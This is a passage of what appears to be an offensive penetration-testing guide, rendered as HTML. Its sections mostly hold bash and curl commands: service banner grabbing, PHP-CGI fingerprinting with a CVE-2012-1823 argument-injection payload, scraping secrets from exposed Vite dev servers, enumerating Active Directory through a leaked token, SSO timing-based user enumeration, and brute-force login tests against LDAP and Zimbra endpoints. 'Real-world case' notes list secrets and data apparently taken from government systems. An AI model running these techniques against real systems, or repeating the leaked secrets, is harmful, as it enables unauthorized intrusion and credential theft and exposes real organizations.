&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;timeout &lt;span style="color:#ef9f76"&gt;3&lt;/span&gt; bash -c &lt;span style="color:#a6d189"&gt;&amp;#39;exec 3&amp;lt;&amp;gt;/dev/tcp/TARGET_IP/3306; head -1 &amp;lt;&amp;amp;3&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Output: 5.7.42-0ubuntu0.18.04.1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# FTP — banner without ftp client&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;timeout &lt;span style="color:#ef9f76"&gt;3&lt;/span&gt; bash -c &lt;span style="color:#a6d189"&gt;&amp;#39;exec 3&amp;lt;&amp;gt;/dev/tcp/TARGET_IP/21; head -1 &amp;lt;&amp;amp;3&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Output: 220 (vsFTPd 3.0.3)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# SMTP&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;timeout &lt;span style="color:#ef9f76"&gt;3&lt;/span&gt; bash -c &lt;span style="color:#a6d189"&gt;&amp;#39;exec 3&amp;lt;&amp;gt;/dev/tcp/TARGET_IP/25; head -1 &amp;lt;&amp;amp;3&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# SSH&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;timeout &lt;span style="color:#ef9f76"&gt;3&lt;/span&gt; bash -c &lt;span style="color:#a6d189"&gt;&amp;#39;exec 3&amp;lt;&amp;gt;/dev/tcp/TARGET_IP/22; head -1 &amp;lt;&amp;amp;3&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Output: SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.7&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Works for ANY TCP service — no dependencies&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="254-php-cgi-query-string-fingerprinting" &gt;
&lt;div&gt;
&lt;a href="#254-php-cgi-query-string-fingerprinting"&gt;
##
&lt;/a&gt;
25.4 PHP CGI Query String Fingerprinting
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;When PHP runs as CGI/FastCGI (not as mod_php), special URLs reveal the version:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# PHP Credits (14KB HTML — confirms CGI mode + exact version)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# PHP Logo (confirms GD module)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/?=PHPE9568F34-D428-11d2-A769-00AA001ACF42&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Returns GIF 120x67&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If it works → PHP CGI mode → CVE-2012-1823 and variants applicable&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Potential payload: ?-d+allow_url_include%3dOn+-d+auto_prepend_file%3dphp://input&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="255-vite-dev-server--full-source-code-exposed" &gt;
&lt;div&gt;
&lt;a href="#255-vite-dev-server--full-source-code-exposed"&gt;
##
&lt;/a&gt;
25.5 Vite Dev Server — Full Source Code Exposed
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. Check if Vite is in dev mode&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/src/env.ts&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Contains VITE_JWT_SECRET, VITE_API_TOKEN in plain text!&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. Check Dockerfile (CMD npm run dev -- --host = DEV in production!)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/Dockerfile&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 3. Enumerate ALL source files&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/package.json&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# dependencies, scripts&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/vite.config.ts&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# build configuration&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/tsconfig.json&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# paths, aliases&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/src/lib/axios.ts&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# HTTP client with API URLs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/src/api/*.ts&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# ALL endpoints&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 4. Extract secrets from source files&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/src/env.ts&amp;#34;&lt;/span&gt; | grep -oP &lt;span style="color:#a6d189"&gt;&amp;#39;(?:SECRET|KEY|TOKEN|PASSWORD)\s*[:=]\s*[&amp;#34;\&amp;#39;&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;][&lt;/span&gt;^&lt;span style="color:#a6d189"&gt;&amp;#34;\&amp;#39;]+&amp;#39;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Real-world case&lt;/strong&gt;: Government agency — server in Vite dev mode:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;45 TypeScript files served publicly&lt;/li&gt;
&lt;li&gt;&lt;code&gt;VITE_JWT_SECRET=b0c1df0e3f9c1e858d3bb0b8d58a119&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;VITE_API_TOKEN=0bd85d3032b8e93137fe83c3b729eb90&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;VITE_LDAP_AUTH=https://environment.gov.br&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Dockerfile: &lt;code&gt;CMD npm run dev -- --host&lt;/code&gt; (DEV in production!)&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="256-active-directory-via-token-in-public-html" &gt;
&lt;div&gt;
&lt;a href="#256-active-directory-via-token-in-public-html"&gt;
##
&lt;/a&gt;
25.6 Active Directory via Token in Public HTML
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. Search for tokens/authkeys in login page HTML&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://interativa.TARGET.com/&amp;#34;&lt;/span&gt; | grep -oP &lt;span style="color:#a6d189"&gt;&amp;#39;(?:authkey|token|apiKey)[&amp;#34;\&amp;#39;&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;]&lt;/span&gt;?&lt;span style="color:#8caaee"&gt;\s&lt;/span&gt;*&lt;span style="color:#99d1db;font-weight:bold"&gt;[&lt;/span&gt;:&lt;span style="color:#99d1db;font-weight:bold"&gt;=]&lt;/span&gt;&lt;span style="color:#8caaee"&gt;\s&lt;/span&gt;*&lt;span style="color:#99d1db;font-weight:bold"&gt;[&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;\&amp;#39;][a-f0-9]{32,40}&amp;#39;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;# 2. If a token is found, test it against the LDAP API
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;TOKEN=&amp;#34;&lt;/span&gt;4d37b3545106aae4622122b7ce395d4e&lt;span style="color:#a6d189"&gt;&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;curl -H &amp;#34;&lt;/span&gt;AuthorizationApi: &lt;span style="color:#f2d5cf"&gt;$TOKEN&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34; \
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt; &amp;#34;&lt;/span&gt;https://environment.TARGET.com/api/filtered-users?page&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;1&amp;amp;&lt;span style="color:#f2d5cf"&gt;limit&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;1000&lt;span style="color:#a6d189"&gt;&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;# → 389 AD users: sAMAccountName, displayName, email, DN, groups
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;# 3. List AD groups
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;curl -H &amp;#34;&lt;/span&gt;AuthorizationApi: &lt;span style="color:#f2d5cf"&gt;$TOKEN&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34; &amp;#34;&lt;/span&gt;https://environment.TARGET.com/api/groups&lt;span style="color:#a6d189"&gt;&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;# → 200 groups with full OU structure
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;# 4. AD details (pwdLastSet, userAccountControl, memberOf)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;curl -H &amp;#34;&lt;/span&gt;AuthorizationApi: &lt;span style="color:#f2d5cf"&gt;$TOKEN&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34; &amp;#34;&lt;/span&gt;https://environment.TARGET.com/api/users&lt;span style="color:#a6d189"&gt;&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;# 5. Test credentials (UNLIMITED brute force if no rate limit)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;curl -X POST &amp;#34;&lt;/span&gt;https://environment.TARGET.com/api/auth&lt;span style="color:#a6d189"&gt;&amp;#34; \
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt; -H &amp;#34;&lt;/span&gt;AuthorizationApi: &lt;span style="color:#f2d5cf"&gt;$TOKEN&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34; \
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt; -H &amp;#34;&lt;/span&gt;Content-Type: application/json&lt;span style="color:#a6d189"&gt;&amp;#34; \
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt; -d &amp;#39;{&amp;#34;&lt;/span&gt;username&lt;span style="color:#a6d189"&gt;&amp;#34;:&amp;#34;&lt;/span&gt;admin&lt;span style="color:#a6d189"&gt;&amp;#34;,&amp;#34;&lt;/span&gt;password&lt;span style="color:#a6d189"&gt;&amp;#34;:&amp;#34;&lt;/span&gt;password&lt;span style="color:#a6d189"&gt;&amp;#34;,&amp;#34;&lt;/span&gt;origin&lt;span style="color:#a6d189"&gt;&amp;#34;:&amp;#34;&lt;/span&gt;0.0.0.0&lt;span style="color:#a6d189"&gt;&amp;#34;}&amp;#39;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;# If 200 → valid credential; if 401 → invalid (enumeration!)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Real-world case&lt;/strong&gt;: State government — token &lt;code&gt;4d37b35...&lt;/code&gt; found in intranet HTML:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;389 AD users extracted with names, emails, groups&lt;/li&gt;
&lt;li&gt;200 AD groups mapped with full OU structure&lt;/li&gt;
&lt;li&gt;4 Domain Admins identified&lt;/li&gt;
&lt;li&gt;UNLIMITED brute force endpoint&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="257-self-hosted-gitlab--public-repos" &gt;
&lt;div&gt;
&lt;a href="#257-self-hosted-gitlab--public-repos"&gt;
##
&lt;/a&gt;
25.7 Self-Hosted GitLab — Public Repos
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. List all public projects&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl &lt;span style="color:#a6d189"&gt;&amp;#34;https://gitlab.TARGET.com/api/v4/projects?visibility=public&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. Read raw files via API&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl &lt;span style="color:#a6d189"&gt;&amp;#34;https://gitlab.TARGET.com/api/v4/projects/{NAMESPACE}%2F{REPO}/repository/files/{PATH}/raw?ref=main&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 3. Check open registration&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sI &lt;span style="color:#a6d189"&gt;&amp;#34;https://gitlab.TARGET.com/users/sign_up&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 200 → anyone can create an account&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 4. Check Container Registry (Docker images)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl &lt;span style="color:#a6d189"&gt;&amp;#34;https://gitlab.TARGET.com/api/v4/projects/{ID}/registry/repositories&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Real-world case&lt;/strong&gt;: Government agency — GitLab with 3 public repositories:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Full Internal Helpdesk (HDI) source code&lt;/li&gt;
&lt;li&gt;&lt;code&gt;servidores_sigrh.json&lt;/code&gt;: 461,304 records with CPF (SSN), registration&lt;/li&gt;
&lt;li&gt;&lt;code&gt;.env.example&lt;/code&gt;: MongoDB host, LDAP, email server&lt;/li&gt;
&lt;li&gt;&lt;code&gt;deploy.sh&lt;/code&gt;: Internal IP 10.11.82.75, blue/green strategy&lt;/li&gt;
&lt;li&gt;&lt;code&gt;.gitlab-ci.yml&lt;/code&gt;: CI/CD tokens, runners&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="258-sso-timing-based-user-enumeration" &gt;
&lt;div&gt;
&lt;a href="#258-sso-timing-based-user-enumeration"&gt;
##
&lt;/a&gt;
25.8 SSO Timing-Based User Enumeration
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Measure response time to validate user existence&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk -X POST &lt;span style="color:#a6d189"&gt;&amp;#34;https://sso.TARGET.com/password&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Content-Type: application/x-www-form-urlencoded&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -d &lt;span style="color:#a6d189"&gt;&amp;#34;user[email]=admin@target.com&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -o /dev/null -w &lt;span style="color:#a6d189"&gt;&amp;#34;admin@target.com: %{time_total}s\n&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# ~0.896s (user EXISTS — backend queries DB)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk -X POST &lt;span style="color:#a6d189"&gt;&amp;#34;https://sso.TARGET.com/password&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -d &lt;span style="color:#a6d189"&gt;&amp;#34;user[email]=nonexistent999@target.com&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -o /dev/null -w &lt;span style="color:#a6d189"&gt;&amp;#34;nonexistent@target.com: %{time_total}s\n&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# ~0.572s (user does NOT EXIST)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Difference &amp;gt; 200ms = timing oracle confirmed&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="259-zimbra-soap-auth--brute-force-test" &gt;
&lt;div&gt;
&lt;a href="#259-zimbra-soap-auth--brute-force-test"&gt;
##
&lt;/a&gt;
25.9 Zimbra SOAP Auth — Brute Force Test
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk -X POST &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET.webmail.com/service/soap/&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Content-Type: application/xml&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -d &lt;span style="color:#a6d189"&gt;&amp;#39;&amp;lt;soap:Envelope xmlns:soap=&amp;#34;http://www.w3.org/2003/05/soap-envelope&amp;#34;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt; &amp;lt;soap:Header&amp;gt;&amp;lt;context xmlns=&amp;#34;urn:zimbra&amp;#34;/&amp;gt;&amp;lt;/soap:Header&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt; &amp;lt;soap:Body&amp;gt;&amp;lt;AuthRequest xmlns=&amp;#34;urn:zimbraAccount&amp;#34;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt; &amp;lt;account by=&amp;#34;name&amp;#34;&amp;gt;admin@TARGET.com&amp;lt;/account&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt; &amp;lt;password&amp;gt;PASSWORD&amp;lt;/password&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt; &amp;lt;/AuthRequest&amp;gt;&amp;lt;/soap:Body&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt; &amp;lt;/soap:Envelope&amp;gt;&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# &amp;#34;account.AUTH_FAILED&amp;#34; → functional endpoint, brute force possible&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# &amp;#34;account.AUTH_EXPIRED&amp;#34; → correct credential but expired account&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2510-wcd-in-angular-spas-catch-all-routing" &gt;
&lt;div&gt;
&lt;a href="#2510-wcd-in-angular-spas-catch-all-routing"&gt;
##
&lt;/a&gt;
25.10 WCD in Angular SPAs (Catch-All Routing)
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;Angular SPAs return &lt;code&gt;text/html&lt;/code&gt; for ANY path (catch-all routing). If the CDN caches paths ending in static extensions, authenticated pages are cached as public resources:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. Confirm the SPA returns HTML for any path&lt;/span&gt;
